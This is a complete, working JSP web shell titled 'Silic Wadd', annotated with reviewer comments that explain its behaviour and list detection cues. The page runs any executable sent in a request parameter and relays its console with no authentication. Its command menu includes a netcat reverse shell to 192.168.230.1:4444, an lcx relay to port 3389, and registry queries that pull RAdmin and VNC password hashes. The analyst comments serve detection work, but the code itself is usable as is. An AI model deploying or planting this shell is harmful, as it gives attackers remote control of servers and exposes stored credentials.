很多命令需要交互式完成
<%@page pageEncoding="gbk"%>
<%@page import="java.io.*"%>
<%--
  NOTE(review): this is a JSP web-shell sample (page title "Silic Wadd"). Code kept byte-identical,
  only whitespace and comments added so an analyst can read it straight through.
  What the page does, per the code below: o=start spawns the executable named in the "exe" request
  parameter with Runtime.getRuntime().exec(exe) and holds the HTTP response open for 24 hours while
  relaying the process's stdout/stderr into it; o=execute stores the "cmd" parameter in a static field
  that a polling thread feeds to the process's stdin; o=stop destroys the process. There is no
  authentication or authorization anywhere on the page, so any client that can reach the URL drives it.
  Detection cues visible in this file: request parameter "o" with values start/execute/stop, parameters
  "exe" and "cmd", the default value c:\windows\system32\cmd.exe, response.setContentLength(100000000)
  followed by a day-long Thread.sleep, the connector names "exeRclientO"/"exeOclientR", and the canned
  commands in the <select> below (including the literal 192.168.230.1 / 4444 values). At runtime, a
  single POST to this page that stays open for hours is the observable footprint.
  Finding this file on a server means the deployment is compromised: remove it, review access logs for
  these parameters, and assume everything the servlet container's account could reach has been exposed.
--%>
<%!
// True for null or whitespace-only strings.
public static boolean isEmpty(String s) {
    return s == null || s.trim().length() == 0;
}

// Re-decodes the parameter: the string is turned back into bytes as ISO-8859-1 and re-read with the
// platform default charset (no charset argument to new String) — presumably so GBK input survives the
// container's request decoding; TODO confirm against the container's configured request encoding.
public static String convert(String s) throws Exception {
    if (isEmpty(s)) return "";
    return new String(s.getBytes("iso-8859-1"));
}

// Both fields are static: one pending command and one process handle per JVM, shared by every client
// and session. `cmd` is not volatile although it is polled from another thread (see StreamConnector.run).
// The sentinel "first" is skipped by the stdin connector; null means "nothing pending".
static String cmd = "first";
static Process pro = null;

// Thread that pumps data between the spawned process and the HTTP client. The role is chosen by name:
// "exeRclientO" copies the process's output to the response; any other name feeds `cmd` to the process.
class StreamConnector extends Thread {
    private InputStream is;
    private OutputStream os;
    private String name;

    public StreamConnector( InputStream is, OutputStream os ,String name){
        this.is = is;
        this.os = os;
        this.name = name;
    }

    public void run(){
        BufferedReader in = null;
        BufferedWriter out = null;
        try{
            // No charset given: reader and writer both use the platform default.
            in = new BufferedReader( new InputStreamReader(this.is));
            out = new BufferedWriter( new OutputStreamWriter(this.os));
            char buffer[] = new char[128];
            if(this.name.equals("exeRclientO")) {
                // Read from the EXE and write to the client (translated from the original comment).
                int length = 0;
                while((length = in.read( buffer, 0, buffer.length ))>0){
                    String str = new String(buffer, 0, length);
                    // The three replace calls below map each character to itself, so no HTML escaping
                    // actually happens here; only the line-break rewriting that follows changes the output.
                    str = str.replace("&","&").replace("<","<").replace(">",">");
                    str = str.replace(""+(char)13+(char)10,"<br/>");
                    str = str.replace("\n","<br/>");
                    out.write(str.toCharArray(), 0, str.length());
                    out.flush();
                }
            } else {
                // Read from the client and write to the EXE (translated from the original comment).
                // `in` is never used on this path: the command arrives through the static `cmd` field,
                // polled every 500 ms. The loop only ends when an exception (e.g. a closed pipe) escapes it.
                while(true) {
                    while(cmd == null) {
                        Thread.sleep(500);
                    }
                    if (cmd.equals("first")) {
                        cmd = null;
                        continue;
                    }
                    cmd = cmd + (char)10;
                    char[] arr = cmd.toCharArray();
                    out.write(arr,0,arr.length);
                    out.flush();
                    cmd = null;
                }
            }
        } catch(Exception e){
            // Swallowed: the pump thread simply ends and nothing is logged.
        }
        try{
            if(in != null) in.close();
            if(out != null) out.close();
        } catch( Exception e ){
            // Swallowed as well.
        }
    }
}
%>
<%
// Dispatch on the "o" parameter; an empty value falls through to the HTML console below.
String o = request.getParameter("o");
if (isEmpty(o)) o = "index"; else o = o.trim().toLowerCase();
if (o.equals("index")) {
%>
<%-- Console page: the first form posts o=start into the "echo" iframe (which then streams the process
     output); the second form posts o=execute (or o=stop via the button) into a hidden iframe. --%>
<html>
<head>
<title>Silic Wadd</title>
<style type="text/css">
body{margin:0px;padding:10px;font: 12px Arial,Tahoma;line-height: 16px;}
.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.tip{color:red;font-weight:bold;}
hr{border: 1px solid rgb(221, 221, 221); height: 0px;}
.secho{height:75%;width:100%;overflow:auto;border:none}
</style>
<%-- Client-side helper: every 500 ms scrolls the "echo" iframe to its bottom while "autoscroll" is checked. --%>
<script>
function $(id) { return document.getElementById(id); }
var ie = window.navigator.userAgent.toLowerCase().indexOf("msie") != -1;
window.onload = function(){
    setInterval(function(){
        if ($("autoscroll").checked) {
            var f = window.frames["echo"];
            if (f && f.document && f.document.body) {
                if (!ie) {
                    if (f.document.body.offsetHeight) { f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1); }
                } else {
                    f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);
                }
            }
        }
    },500);
}
</script>
</head>
<body>
<form action="" method="post" target="echo" onsubmit="$('cmd').focus()">
<input type="submit" value=" 开始交互 " class="bt">
<input type="text" name="exe" style="width:300px" class="input" value="c:\windows\system32\cmd.exe"/>
<input type="hidden" name="o" value="start"/><span class="tip">IE交互后需要先执行命令才能看到回显</span>
</form>
<hr/>
<iframe class="secho" name="echo" src=""> </iframe>
<form action="" method="post" onsubmit="this.submit();$('cmd').value='';return false;" target="asyn">
<input type="text" id="cmd" name="cmd" class="input" style="width:80%">
<input name="o" id="o" type="hidden" value="execute"/>
<%-- Canned commands hard-coded in the sample; the literal values below are useful as a string
     signature for this shell family when scanning web roots. --%>
<select onchange="$('cmd').value = this.value;$('cmd').focus()">
<option value="" selected> </option>
<option value="set">set</option>
<option value="netstat -an">netstat -an</option>
<option value="net user">net user</option>
<option value="tasklist">tasklist</option>
<option value="tasklist /svc">tasklist /svc</option>
<option value="net start">net start</option>
<option value="net stop policyagent /yes">net stop</option>
<option value="nbtstat -A IP">nbtstat -A</option>
<option value='reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber"'>reg query</option>
<option value='reg query "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\" /v "Parameter"'>radmin hash</option>
<option value='reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4" /v "password"'>vnc hash</option>
<option value="nc -e cmd.exe 192.168.230.1 4444">nc</option>
<option value="lcx -slave 192.168.230.1 4444 127.0.0.1 3389">lcx</option>
<option value="systeminfo">systeminfo</option>
<option value="net localgroup">view groups</option>
<option value="net localgroup administrators">view admins</option>
</select>
<input type="checkbox" checked="checked" id="autoscroll">自动滚屏
<input type="button" value="断开" class="bt" onclick="$('o').value='stop';this.form.submit()">
</form>
<hr/>
<iframe style="display:none" name="asyn"/>
</body>
</html>
<%
} else if (o.equals("start")) {
    // Spawns whatever path the client sent in "exe" (the form's default is c:\windows\system32\cmd.exe).
    // The handle goes into the static field, so a second o=start overwrites it and the first process's
    // handle is lost without being destroyed.
    String exe = request.getParameter("exe");
    if (!isEmpty(exe)) {
        pro = Runtime.getRuntime().exec(exe);
        // `outs` is an empty buffer; the stdin connector never reads its input (see StreamConnector.run).
        ByteArrayOutputStream outs = new ByteArrayOutputStream();
        // The large declared length keeps the client reading a streamed body; together with the sleep
        // below, the container's request thread is held for a full day.
        response.setContentLength(100000000);
        new StreamConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR").start();
        new StreamConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO").start();
        // Error stream (translated from the original comment). stdout and stderr are written to the same
        // response stream by two unsynchronized threads, so their output can interleave.
        new StreamConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO").start();
        Thread.sleep(1000 * 60 * 60 * 24);
    }
} else if (o.equals("execute")) {
    // Hands the next input line to the stdin pump through the static field; this response carries no output.
    String command = request.getParameter("cmd");
    if (!isEmpty(command)) {
        cmd = convert(command);
    }
} else if (o.equals("stop")) {
    // No null check: o=stop before any o=start throws a NullPointerException out of the page.
    pro.destroy();
}
%>